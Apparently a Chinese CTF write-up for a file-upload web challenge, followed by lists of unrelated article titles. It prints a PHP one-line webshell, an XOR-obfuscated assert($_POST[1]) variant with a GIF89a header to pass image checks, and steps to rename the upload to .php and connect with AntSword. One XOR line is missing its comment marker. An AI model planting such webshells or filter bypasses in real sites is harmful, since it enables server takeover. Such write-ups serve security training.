题目

 进去之后看到这样一句话

 ctrl+u得到提示

 按照提示进去看看，发现是个文件上传的链接

按照提示修改staus的值然后上传一个木马文件看看

 发现报错了，只允许上传图片文件

 把后缀改成jpg再试试看

 依旧报错，它不仅对后缀名有要求而且会检查文件格式是否符合图片

给一句话木马的开头加上图片格式进行绕过

GIF89a

<?php @eval($_POST["yexi"]);?>

还是哒咩~过滤太多函数了

利用异或的方法重新构造一句话木马

GIF89a

<?=

@$_++;

$___=("~"^"?").("~"^"-").("~"^"-").("~"^";").("~"^",").("~"^"*");//ASSERT

$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");_POST

$___(${$__}[1]);//ASSERT($_POST[1])

?>

因为上传的过程中会检查文件中的关键词所以要把注释去掉，不然会报错

用burpsuite进行抓包，将上传的jpg文件改成php，放掉

 上传成功，可以在uploads中查看

用蚁剑连接，注意勾选base64,连接成功

 按照提示打开index.php即可得到flag

WEB-easy_upload相关推荐

1. UNCTF2020 | Web Wp

   文章目录 Web 0x01:easy_ssrf 0x02:babyeval 0x03:ezphp 0x04:easy_upload 0x05:L0vephp 0x06:easyflask 0x07:e ...

2. 在k8s中使用gradle构建java web项目镜像Dockerfile

   在k8s中使用gradle构建java web项目镜像Dockerfile FROM gradle:6-jdk8 AS build COPY --chown=gradle:gradle . /home ...

3. 手动将web项目的class文件打成jar包，手动打jar包，java -cvf，IDE打包底层指令

   手动将web项目的class文件打成jar包. 我们的项目在使用IDE进行编译后,在项目的target目录下将会生成class文件.我们可以将class文件打成jar包. 使用的到命令为: 在targ ...

4. 将Eclipse中Web项目打成war包

   将Eclipse中Web项目打成war包 请按如下操作即可:

5. Docker安装Apache与运行简单的web服务——httpd helloworld

   Docker运行简单的web服务--httpd helloworld目录[阅读时间:约5分钟] 一.Docker简介 二.Docker的安装与配置[CentOS环境] 三.Docker运行简单的web ...

6. 【Golang源码分析】Go Web常用程序包gorilla/mux的使用与源码简析

   目录[阅读时间:约10分钟] 一.概述 二.对比: gorilla/mux与net/http DefaultServeMux 三.简单使用 四.源码简析 1.NewRouter函数 2.HandleF ...

7. 基于Golang的简单web服务程序开发——CloudGo

   基于Golang的简单web服务程序开发--CloudGo[阅读时间:约10分钟] 一.概述 二.系统环境&项目介绍 1.系统环境 2.项目的任务要求 (1)基本要求 (2)扩展要求 三.具体 ...

8. CentOS Docker安装配置部署Golang web helloworld

   目录[阅读时间:约5分钟] 一.Docker简介 二.Docker的安装与配置[CentOS环境] 三.Docker部署Golang web helloworld 四.Docker与虚拟机的区别 五. ...

9. ideal如何创建dynamic web project

   步骤如下 ① file -> new -> project ② 选择 Java Enterprise -> next ③ create project from template - ...

10. eclipse运行maven web项目

    说在前面:Maven项目对象模型(POM),可以通过一小段描述信息来管理项目的构建,报告和文档的软件项目管理工具.现在好多公司都在使用.有时候我们想在eclipse启动maven项目,怎么操作呢,下面 ...

最新文章

1. adb: unable to connect for root: more than one device/emulator
2. 谷歌自动重建了完整果蝇大脑神经图：40万亿像素，可在线交互，用了数千块TPU...
3. 大型网站架构技术一览
4. php.ini中关于Session的配置
5. properties 特有的方法
6. 王道机试指南读后总结-1
7. WPF中应用字体图标
8. python的传参是传值还是传址
9. css框架之 ---- SASS
10. 拓端tecdat|R语言中小样本违反异方差性的线性回归
11. python mro算法_Python MRO C3算法实现
12. 越狱显示苹果服务器调整,iOS 14 后台切换界面更改？可能是越狱插件修改
13. 内存管理之内存映射——概述
14. 匿名mahony互补滤波代码详解
15. 侧边悬浮在线客服咨询按钮-在线客服按钮代码实现
16. maven项目报error in opening zip file.
17. 在 jdk 1.4 中打印iteye技术网站
18. [kaggle]泰坦尼克预测(代码解析)
19. maya 白天室内灯光_Maya课时：白天的灯光构建视频教程_翼狐网
20. Hadoop 3.x搭建基础HDFS集群

热门文章

1. 起底币圈地下骗局：传销币、资金盘横行，百亿财富被黑手收割
2. socket是什么？有什么作用？
3. Hbase与Oracle比较（列式数据库与行式数据库）
4. windows系统锁定计算机组合键,WIN键间断性触发在锁定状态！！
5. 前后端分离模式下前端与后端数据交互
6. 集合（List集合、数据结构、List集合的实现类）
7. SpringBoot整合rabbitmq使用案例
8. BZOJ 3238 [Ahoi2013]差异
9. EXCEL 2010添加趋势线
10. linux 实时性 100ms,实时录播延迟长达100ms